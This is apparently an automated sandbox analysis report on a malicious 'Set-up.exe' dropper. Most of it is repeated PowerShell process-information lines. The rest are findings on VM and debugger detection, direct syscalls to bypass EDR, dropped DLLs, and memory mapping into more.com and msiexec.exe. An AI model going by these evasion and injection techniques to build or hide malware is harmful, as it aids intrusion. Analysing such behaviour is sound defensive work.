                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Query firmware table information (likely to detect VMs)
                    Source: C:\Windows\SysWOW64\msiexec.exeSystem information queried: FirmwareTableInformationJump to behavior
                    Switches to a custom stack to bypass stack traces
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeAPI/Special instruction interceptor: Address: 6B847C44
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeAPI/Special instruction interceptor: Address: 6B847945
                    Source: C:\Windows\SysWOW64\more.comAPI/Special instruction interceptor: Address: 6B843B54
                    Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: DFBC87
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2752Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7025Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1905Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 737Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\VWPGdipf\UpdateClient.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\VWPGdipf\UpdateCommon.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\VWPGdipf\RcClientBase.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\VWPGdipf\NAudio.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\VWPGdipf\Data\d3dcompiler_47.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\VWPGdipf\Data\Updater.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\VWPGdipf\Resource.ctJump to dropped file
                    Source: C:\Windows\SysWOW64\more.comDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wpkoqtsrtJump to dropped file
                    Source: C:\Windows\SysWOW64\more.comDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\yhgJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\VWPGdipf\Data\ffmpeg.dllJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeAPI coverage: 0.3 %
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeAPI coverage: 0.5 %
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5812Thread sleep time: -11990383647911201s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exe TID: 3264Thread sleep time: -180000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exe TID: 2076Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6480Thread sleep count: 1905 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6480Thread sleep count: 737 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6576Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_6BB781A1 _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,5_2_6BB781A1
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_6BBAC8FD _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,5_2_6BBAC8FD
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_6BBACC23 _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,5_2_6BBACC23
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_6BB9BE38 GetSystemInfo,_memset,GetVersionExW,Concurrency::unsupported_os::unsupported_os,_CxxThrowException,GetModuleHandleW,GetProcAddress,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,Concurrency::unsupported_os::unsupported_os,GetModuleHandleW,GetProcAddress,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,GetLastError,GetLastError,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,malloc,std::exception::exception,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,free,GetLastError,GetLastError,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,malloc,std::exception::exception,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,free,Concurrency::unsupported_os::unsupported_os,5_2_6BB9BE38
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: VMware
                    Source: Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
                    Source: Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
                    Source: Set-up.exe, 00000005.00000003.1990219260.0000000003F0A000.00000004.00000001.00020000.00000000.sdmp, Set-up.exe, 00000008.00000003.2079722066.00000000042E6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: [ed'ee.?AVQEmulationPaintEngine@@0/
                    Source: Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
                    Source: Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
                    Source: Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
                    Source: Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
                    Source: Set-up.exe, 00000005.00000002.2023342146.000000006C53F000.00000008.00000001.01000000.0000000C.sdmp, Set-up.exe, 00000008.00000002.2162985653.000000006C53F000.00000008.00000001.01000000.0000000C.sdmpBinary or memory string: 4ld'>l.?AVQEmulationPaintEngine@@0/
                    Source: Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: <&version=&md5=&newsize=&registercode=&registertime=&langStr=&fname=&lname=&email=&activecode=action=wbrb\\.\PhysicalDrive0VMwareb71710ea1f7bf1b2
                    Source: Set-up.exe, 00000005.00000003.1990219260.0000000003F0A000.00000004.00000001.00020000.00000000.sdmp, Set-up.exe, 00000005.00000002.2023342146.000000006C53F000.00000008.00000001.01000000.0000000C.sdmp, Set-up.exe, 00000008.00000003.2079722066.00000000042E6000.00000004.00000001.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2162985653.000000006C53F000.00000008.00000001.01000000.0000000C.sdmpBinary or memory string: .?AVQEmulationPaintEngine@@
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeAPI call chain: ExitProcess graph end nodegraph_5-23703
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Found API chain indicative of debugger detection
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_8-16542
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_6BB607A7 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,5_2_6BB607A7
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_6BBDB5A7 _encoded_null,LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,5_2_6BBDB5A7
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_6BBD9B6F __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,_errno,_errno,__setmode_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__doserrno,_errno,__lseeki64_nolock,_get_osfhandle,SetEndOfFile,_errno,__doserrno,GetLastError,__lseeki64_nolock,5_2_6BBD9B6F
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_6BB607A7 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,5_2_6BB607A7
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_6BBDAD2C _crt_debugger_hook,_memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,5_2_6BBDAD2C
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 8_2_6BC43727 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,8_2_6BC43727

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Found direct / indirect Syscall (likely to bypass EDR)
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeNtSetInformationThread: Direct from: 0x6C5D62B9Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeNtProtectVirtualMemory: Direct from: 0x76EF63E1Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
                    Maps a DLL or memory area into another process
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: NULL target: C:\Windows\SysWOW64\more.com protection: read writeJump to behavior
                    Source: C:\Windows\SysWOW64\more.comSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: read writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: NULL target: C:\Windows\SysWOW64\more.com protection: read writeJump to behavior
                    Source: C:\Windows\SysWOW64\more.comSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: read writeJump to behavior
